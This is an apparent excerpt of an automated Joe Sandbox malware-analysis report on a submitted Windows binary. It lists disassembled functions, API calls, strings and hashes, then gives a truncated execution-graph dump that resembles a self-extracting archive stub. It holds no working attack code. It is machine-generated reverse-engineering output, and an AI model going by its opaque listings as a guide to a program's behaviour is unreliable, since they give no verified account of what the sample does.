                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3C67E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: }
                                                                                              • API String ID: 176396367-4239843852
                                                                                              • Opcode ID: b2e0a767a42aeb2697b79011e3d8be24f883491838920de173c1b5e78846afbb
                                                                                              • Instruction ID: 4bd86c2c6113b06f6a4af23692c827e9486c109822abe213a91ad40173afacd4
                                                                                              • Opcode Fuzzy Hash: b2e0a767a42aeb2697b79011e3d8be24f883491838920de173c1b5e78846afbb
                                                                                              • Instruction Fuzzy Hash: AC21E4729083166AD731EB64DE46A6BB3ECDF85770F10042AF940E3141FB75ED4887A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3069C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A30627: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A30646
                                                                                                • Part of subcall function 00A30627: GetProcAddress.KERNEL32(00A6A1F0,CryptUnprotectMemory), ref: 00A30656
                                                                                              • GetCurrentProcessId.KERNEL32(?,00000200,?,00A30697), ref: 00A3072A
                                                                                              Strings
                                                                                              • CryptUnprotectMemory failed, xrefs: 00A30722
                                                                                              • CryptProtectMemory failed, xrefs: 00A306E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                              • API String ID: 2190909847-396321323
                                                                                              • Opcode ID: a0b1e9a34959d0b3f11f78697a18c76661a7dbce1a3b1defe65d29a40ca33ccc
                                                                                              • Instruction ID: ae6f7815a9ca57243b9426dbd73609ff5a2a8d3e0f00988e4238265a37d375b5
                                                                                              • Opcode Fuzzy Hash: a0b1e9a34959d0b3f11f78697a18c76661a7dbce1a3b1defe65d29a40ca33ccc
                                                                                              • Instruction Fuzzy Hash: 49112631A00A64ABDF119F24AC62E6E3B68FF54B68F064215FC016B291D770AD828ED5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2CDC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00A2CDE7
                                                                                                • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 1543624204-3142399695
                                                                                              • Opcode ID: 346948d6655ab3d53217b4f871be245a80085708e0eb0ac520f6eba8a6d94acd
                                                                                              • Instruction ID: d074d2097bfc162fc37d293830e50c39ea587cdb2e630029a3045bd191c51866
                                                                                              • Opcode Fuzzy Hash: 346948d6655ab3d53217b4f871be245a80085708e0eb0ac520f6eba8a6d94acd
                                                                                              • Instruction Fuzzy Hash: BA01F5671043217ADA306B6DAC47D6FA7BCEFD5770B40442AF844D6082EA30D850C2A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3EEF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(0001046C), ref: 00A3EF2A
                                                                                              • DialogBoxParamW.USER32(GETPASSWORD1,0001046C,00A3C460,?), ref: 00A3EF65
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogParamVisibleWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 3157717868-3292211884
                                                                                              • Opcode ID: 863d9c98ac6dae7def033f48a23634f07e53105cafcacbeccb4bcf2f326f5097
                                                                                              • Instruction ID: f69b7586e51d884f0b8c34ee1a96cd5dfcf6fa2d12634f1ab307097216a68142
                                                                                              • Opcode Fuzzy Hash: 863d9c98ac6dae7def033f48a23634f07e53105cafcacbeccb4bcf2f326f5097
                                                                                              • Instruction Fuzzy Hash: 9011E5356452A47FDB11DBB8AC16FEA37A8BB05741F148121F845A20D1CAF0AC85DF72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3233E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00010000,00A32480,?,00000000,00000000), ref: 00A32362
                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 00A323A9
                                                                                                • Part of subcall function 00A276E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A27707
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                              • String ID: CreateThread failed
                                                                                              • API String ID: 2655393344-3849766595
                                                                                              • Opcode ID: 537529b1dc4e3a4934decdba9b7c560b04507cb25ea50a11e8dc0454c427d737
                                                                                              • Instruction ID: e24a904c29d82e3f5c37e053a6cbcd7260543e075c80b0d629594ddc4087a95d
                                                                                              • Opcode Fuzzy Hash: 537529b1dc4e3a4934decdba9b7c560b04507cb25ea50a11e8dc0454c427d737
                                                                                              • Instruction Fuzzy Hash: EC01D6B63487027FD620AF64EC82F66B3A8FB44712F20053DF6469A1D0CAB1A8858720
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A212F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A2F608: _swprintf.LIBCMT ref: 00A2F62E
                                                                                                • Part of subcall function 00A2F608: _strlen.LIBCMT ref: 00A2F64F
                                                                                                • Part of subcall function 00A2F608: SetDlgItemTextW.USER32(?,00A60274,?), ref: 00A2F6AF
                                                                                                • Part of subcall function 00A2F608: GetWindowRect.USER32(?,?), ref: 00A2F6E9
                                                                                                • Part of subcall function 00A2F608: GetClientRect.USER32(?,?), ref: 00A2F6F5
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
                                                                                              • SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0
                                                                                              • API String ID: 2622349952-4108050209
                                                                                              • Opcode ID: 120d24353b4542800a7d7a90f819727e0c72a54b9bf4b5d5fcb36c3f69a843df
                                                                                              • Instruction ID: e92cc92d881540042717d256948edcd0b660666fca021f4c40b7d17af6e8608a
                                                                                              • Opcode Fuzzy Hash: 120d24353b4542800a7d7a90f819727e0c72a54b9bf4b5d5fcb36c3f69a843df
                                                                                              • Instruction Fuzzy Hash: 20F02231000398BBDF569F68AC0CBF93BAABF24389F444134FE44484A1CB74C985EB10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A32303 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00A32526,?), ref: 00A32309
                                                                                              • GetLastError.KERNEL32(?), ref: 00A32315
                                                                                                • Part of subcall function 00A276E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A27707
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00A3231E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              • API String ID: 1091760877-2248577382
                                                                                              • Opcode ID: 0337fad1398f74623ca9d629e94cadcd5f790e3fac987618448fd97e4c3dbe5e
                                                                                              • Instruction ID: 7201fb16c89aa26c50895b8b65304ff73c0ded47574fde19ea06a61e4c9face6
                                                                                              • Opcode Fuzzy Hash: 0337fad1398f74623ca9d629e94cadcd5f790e3fac987618448fd97e4c3dbe5e
                                                                                              • Instruction Fuzzy Hash: 16D02B3280C53033C500233C7C09D6F38147F21331FB00714F239551E0CA740A9242A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2F5BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00A2ED75,?), ref: 00A2F5C3
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00A2ED75,?), ref: 00A2F5D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: RTL
                                                                                              • API String ID: 3537982541-834975271
                                                                                              • Opcode ID: 09517c7fe6494cedeb00080cf8b6984228493fd93a92005952621fcdf4c87859
                                                                                              • Instruction ID: c4cd337b8a7babc3b28e846e2907bb5062e834cf8f1c1def6d677c13c37278d2
                                                                                              • Opcode Fuzzy Hash: 09517c7fe6494cedeb00080cf8b6984228493fd93a92005952621fcdf4c87859
                                                                                              • Instruction Fuzzy Hash: C7C0123124535076E63067B57C0DB832EA87B0475AF150468B601DA5C0DAE9C8C58660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:10.6%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:1680
                                                                                              Total number of Limit Nodes:52
                                                                                              execution_graph 26174 330733 20 API calls 26098 312430 26 API calls std::bad_exception::bad_exception 23947 32f431 23949 32f335 23947->23949 23950 32f9e9 23949->23950 23976 32f747 23950->23976 23952 32f9f9 23953 32fa56 23952->23953 23965 32fa7a 23952->23965 23954 32f987 DloadReleaseSectionWriteAccess 6 API calls 23953->23954 23955 32fa61 RaiseException 23954->23955 23956 32fc4f 23955->23956 23956->23949 23957 32faf2 LoadLibraryExA 23958 32fb53 23957->23958 23959 32fb05 GetLastError 23957->23959 23960 32fb5e FreeLibrary 23958->23960 23964 32fb65 23958->23964 23961 32fb18 23959->23961 23962 32fb2e 23959->23962 23960->23964 23961->23958 23961->23962 23966 32f987 DloadReleaseSectionWriteAccess 6 API calls 23962->23966 23963 32fbc3 GetProcAddress 23967 32fbd3 GetLastError 23963->23967 23970 32fc21 23963->23970 23964->23963 23964->23970 23965->23957 23965->23958 23965->23964 23965->23970 23968 32fb39 RaiseException 23966->23968 23974 32fbe6 23967->23974 23968->23956 23985 32f987 23970->23985 23971 32f987 DloadReleaseSectionWriteAccess 6 API calls 23972 32fc07 RaiseException 23971->23972 23973 32f747 ___delayLoadHelper2@8 6 API calls 23972->23973 23975 32fc1e 23973->23975 23974->23970 23974->23971 23975->23970 23977 32f753 23976->23977 23978 32f779 23976->23978 23993 32f7f0 23977->23993 23978->23952 23980 32f758 23982 32f774 23980->23982 23996 32f919 23980->23996 24001 32f77a GetModuleHandleW GetProcAddress GetProcAddress 23982->24001 23984 32f9c2 23984->23952 23986 32f9bb 23985->23986 23987 32f999 23985->23987 23986->23956 23988 32f7f0 DloadReleaseSectionWriteAccess 3 API calls 23987->23988 23989 32f99e 23988->23989 23990 32f9b6 23989->23990 23991 32f919 DloadProtectSection 3 API calls 23989->23991 24004 32f9bd GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23990->24004 23991->23990 24002 32f77a GetModuleHandleW GetProcAddress GetProcAddress 23993->24002 23995 32f7f5 23995->23980 23997 32f92e DloadProtectSection 23996->23997 23998 32f969 VirtualProtect 23997->23998 23999 32f934 23997->23999 24003 32f82f VirtualQuery GetSystemInfo 23997->24003 23998->23999 23999->23982 24001->23984 24002->23995 24003->23998 24004->23986 26175 339330 52 API calls 3 library calls 24062 320534 24063 320544 24062->24063 24064 32053c FreeLibrary 24062->24064 24064->24063 26099 312037 143 API calls __EH_prolog 24067 31213d 24068 312150 24067->24068 24069 312148 24067->24069 24071 31214e 24068->24071 24073 32febe 24068->24073 24086 312162 27 API calls Concurrency::cancel_current_task 24069->24086 24074 32fec3 ___std_exception_copy 24073->24074 24075 32fedd 24074->24075 24077 32fedf 24074->24077 24089 338e5c 7 API calls 2 library calls 24074->24089 24075->24071 24078 3148f5 Concurrency::cancel_current_task 24077->24078 24080 32fee9 24077->24080 24087 333340 RaiseException 24078->24087 24090 333340 RaiseException 24080->24090 24081 314911 24083 314927 24081->24083 24088 31136b 26 API calls Concurrency::cancel_current_task 24081->24088 24083->24071 24084 330820 24086->24071 24087->24081 24088->24083 24089->24074 24090->24084 24093 32f73d 24095 32f704 24093->24095 24094 32f9e9 ___delayLoadHelper2@8 14 API calls 24094->24095 24095->24093 24095->24094 26129 316920 41 API calls __EH_prolog 26100 32d420 91 API calls _swprintf 24098 33a620 24106 33bf6f 24098->24106 24102 33a63c 24103 33a649 24102->24103 24114 33a650 11 API calls 24102->24114 24105 33a634 24107 33be58 __dosmaperr 5 API calls 24106->24107 24108 33bf96 24107->24108 24109 33bfae TlsAlloc 24108->24109 24111 33bf9f 24108->24111 24109->24111 24110 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24112 33a62a 24110->24112 24111->24110 24112->24105 24113 33a599 20 API calls 2 library calls 24112->24113 24113->24102 24114->24105 26101 311025 29 API calls 24120 32f32b 14 API calls ___delayLoadHelper2@8 26159 33962a 55 API calls _free 26102 32742e 138 API calls __InternalCxxFrameHandler 24122 31ca2e 24123 31ca40 __cftof 24122->24123 24126 3223fb 24123->24126 24129 3223bd GetCurrentProcess GetProcessAffinityMask 24126->24129 24130 31ca97 24129->24130 24132 330612 24133 33061e ___scrt_is_nonwritable_in_current_image 24132->24133 24164 3301ac 24133->24164 24135 330625 24136 330778 24135->24136 24139 33064f 24135->24139 24241 330a0a 4 API calls 2 library calls 24136->24241 24138 33077f 24234 33931a 24138->24234 24152 33068e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24139->24152 24175 339ebd 24139->24175 24146 33066e 24148 3306ef 24183 330b25 GetStartupInfoW __cftof 24148->24183 24150 3306f5 24184 339e0e 51 API calls 24150->24184 24152->24148 24237 338e0c 38 API calls 3 library calls 24152->24237 24153 3306fd 24185 32f05c 24153->24185 24158 330711 24158->24138 24159 330715 24158->24159 24160 33071e 24159->24160 24239 3392bd 28 API calls _abort 24159->24239 24240 33031d 12 API calls ___scrt_uninitialize_crt 24160->24240 24163 330726 24163->24146 24165 3301b5 24164->24165 24243 330826 IsProcessorFeaturePresent 24165->24243 24167 3301c1 24244 333bee 24167->24244 24169 3301c6 24174 3301ca 24169->24174 24252 339d47 24169->24252 24172 3301e1 24172->24135 24174->24135 24177 339ed4 24175->24177 24176 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24178 330668 24176->24178 24177->24176 24178->24146 24179 339e61 24178->24179 24180 339e90 24179->24180 24181 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24180->24181 24182 339eb9 24181->24182 24182->24152 24183->24150 24184->24153 24359 321b83 24185->24359 24189 32f07c 24408 32bd1b 24189->24408 24191 32f085 __cftof 24192 32f098 GetCommandLineW 24191->24192 24193 32f0ab 24192->24193 24194 32f13c GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24192->24194 24412 32d708 83 API calls 24193->24412 24430 314a20 24194->24430 24197 32f0b1 24199 32f136 24197->24199 24200 32f0b9 OpenFileMappingW 24197->24200 24471 32ed2e SetEnvironmentVariableW SetEnvironmentVariableW 24199->24471 24203 32f0d1 MapViewOfFile 24200->24203 24204 32f12d CloseHandle 24200->24204 24206 32f0e2 __InternalCxxFrameHandler 24203->24206 24207 32f126 UnmapViewOfFile 24203->24207 24204->24194 24413 32ed2e SetEnvironmentVariableW SetEnvironmentVariableW 24206->24413 24207->24204 24213 32f0fe 24414 32069c 24213->24414 24214 32a0d7 27 API calls 24216 32f203 DialogBoxParamW 24214->24216 24220 32f23d 24216->24220 24219 32f11d 24219->24207 24221 32f24f Sleep 24220->24221 24222 32f256 24220->24222 24221->24222 24225 32f264 24222->24225 24460 32bfb3 24222->24460 24224 32f283 DeleteObject 24226 32f298 DeleteObject 24224->24226 24227 32f29f 24224->24227 24225->24224 24226->24227 24228 32f2e2 24227->24228 24229 32f2d0 24227->24229 24468 32bd81 24228->24468 24472 32ed8b WaitForSingleObject 24229->24472 24233 32f31c 24238 330b5b GetModuleHandleW 24233->24238 24764 339097 24234->24764 24237->24148 24238->24158 24239->24160 24240->24163 24241->24138 24243->24167 24256 334c97 24244->24256 24247 333bf7 24247->24169 24249 333bff 24250 333c0a 24249->24250 24270 334cd3 DeleteCriticalSection 24249->24270 24250->24169 24297 33d21a 24252->24297 24255 333c0d 7 API calls 2 library calls 24255->24174 24258 334ca0 24256->24258 24259 334cc9 24258->24259 24260 333bf3 24258->24260 24271 334edc 24258->24271 24276 334cd3 DeleteCriticalSection 24259->24276 24260->24247 24262 333d1c 24260->24262 24290 334ded 24262->24290 24265 333d31 24265->24249 24267 333d3f 24268 333d4c 24267->24268 24296 333d4f 6 API calls ___vcrt_FlsFree 24267->24296 24268->24249 24270->24247 24277 334d02 24271->24277 24274 334f14 InitializeCriticalSectionAndSpinCount 24275 334eff 24274->24275 24275->24258 24276->24260 24278 334d23 24277->24278 24279 334d1f 24277->24279 24278->24279 24280 334d8b GetProcAddress 24278->24280 24283 334d7c 24278->24283 24285 334da2 LoadLibraryExW 24278->24285 24279->24274 24279->24275 24280->24279 24282 334d99 24280->24282 24282->24279 24283->24280 24284 334d84 FreeLibrary 24283->24284 24284->24280 24286 334de9 24285->24286 24287 334db9 GetLastError 24285->24287 24286->24278 24287->24286 24288 334dc4 ___vcrt_InitializeCriticalSectionEx 24287->24288 24288->24286 24289 334dda LoadLibraryExW 24288->24289 24289->24278 24291 334d02 ___vcrt_InitializeCriticalSectionEx 5 API calls 24290->24291 24292 334e07 24291->24292 24293 334e20 TlsAlloc 24292->24293 24294 333d26 24292->24294 24294->24265 24295 334e9e 6 API calls ___vcrt_InitializeCriticalSectionEx 24294->24295 24295->24267 24296->24265 24299 33d233 24297->24299 24301 33d237 24297->24301 24298 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24300 3301d3 24298->24300 24299->24298 24300->24172 24300->24255 24301->24299 24303 33b860 24301->24303 24304 33b86c ___scrt_is_nonwritable_in_current_image 24303->24304 24315 33bdf1 EnterCriticalSection 24304->24315 24306 33b873 24316 33d6e8 24306->24316 24308 33b882 24314 33b891 24308->24314 24329 33b6e9 29 API calls 24308->24329 24311 33b88c 24330 33b79f GetStdHandle GetFileType 24311->24330 24312 33b8a2 _abort 24312->24301 24331 33b8ad LeaveCriticalSection _abort 24314->24331 24315->24306 24317 33d6f4 ___scrt_is_nonwritable_in_current_image 24316->24317 24318 33d701 24317->24318 24319 33d718 24317->24319 24340 33a7eb 20 API calls __dosmaperr 24318->24340 24332 33bdf1 EnterCriticalSection 24319->24332 24322 33d706 24341 3351b9 26 API calls ___std_exception_copy 24322->24341 24324 33d710 _abort 24324->24308 24325 33d750 24342 33d777 LeaveCriticalSection _abort 24325->24342 24327 33d724 24327->24325 24333 33d639 24327->24333 24329->24311 24330->24314 24331->24312 24332->24327 24343 33c2f6 24333->24343 24335 33d658 24350 33a66a 24335->24350 24336 33d64b 24336->24335 24338 33c0ca 11 API calls 24336->24338 24338->24336 24339 33d6aa 24339->24327 24340->24322 24341->24324 24342->24324 24348 33c303 __dosmaperr 24343->24348 24344 33c343 24357 33a7eb 20 API calls __dosmaperr 24344->24357 24345 33c32e RtlAllocateHeap 24346 33c341 24345->24346 24345->24348 24346->24336 24348->24344 24348->24345 24356 338e5c 7 API calls 2 library calls 24348->24356 24351 33a69e __dosmaperr 24350->24351 24352 33a675 RtlFreeHeap 24350->24352 24351->24339 24352->24351 24353 33a68a 24352->24353 24358 33a7eb 20 API calls __dosmaperr 24353->24358 24355 33a690 GetLastError 24355->24351 24356->24348 24357->24346 24358->24355 24478 32ffd0 24359->24478 24362 321c07 24364 321f34 GetModuleFileNameW 24362->24364 24489 3389ee 42 API calls 2 library calls 24362->24489 24363 321ba8 GetProcAddress 24365 321bc1 24363->24365 24366 321bd9 GetProcAddress 24363->24366 24375 321f52 24364->24375 24365->24366 24367 321beb 24366->24367 24367->24362 24369 321e74 24369->24364 24370 321e7f GetModuleFileNameW CreateFileW 24369->24370 24371 321f28 CloseHandle 24370->24371 24372 321eaf SetFilePointer 24370->24372 24371->24364 24372->24371 24373 321ebd ReadFile 24372->24373 24373->24371 24377 321edb 24373->24377 24378 321fb4 GetFileAttributesW 24375->24378 24380 321f7d CompareStringW 24375->24380 24381 321fcc 24375->24381 24480 31c619 24375->24480 24483 321b3b 24375->24483 24377->24371 24379 321b3b 2 API calls 24377->24379 24378->24375 24378->24381 24379->24377 24380->24375 24382 321fd7 24381->24382 24384 32200c 24381->24384 24385 321ff0 GetFileAttributesW 24382->24385 24387 322008 24382->24387 24383 32211b 24407 32b65d GetCurrentDirectoryW 24383->24407 24384->24383 24386 31c619 GetVersionExW 24384->24386 24385->24382 24385->24387 24388 322026 24386->24388 24387->24384 24389 322093 24388->24389 24390 32202d 24388->24390 24391 314a20 _swprintf 51 API calls 24389->24391 24392 321b3b 2 API calls 24390->24392 24393 3220bb AllocConsole 24391->24393 24394 322037 24392->24394 24395 322113 ExitProcess 24393->24395 24396 3220c8 GetCurrentProcessId AttachConsole 24393->24396 24397 321b3b 2 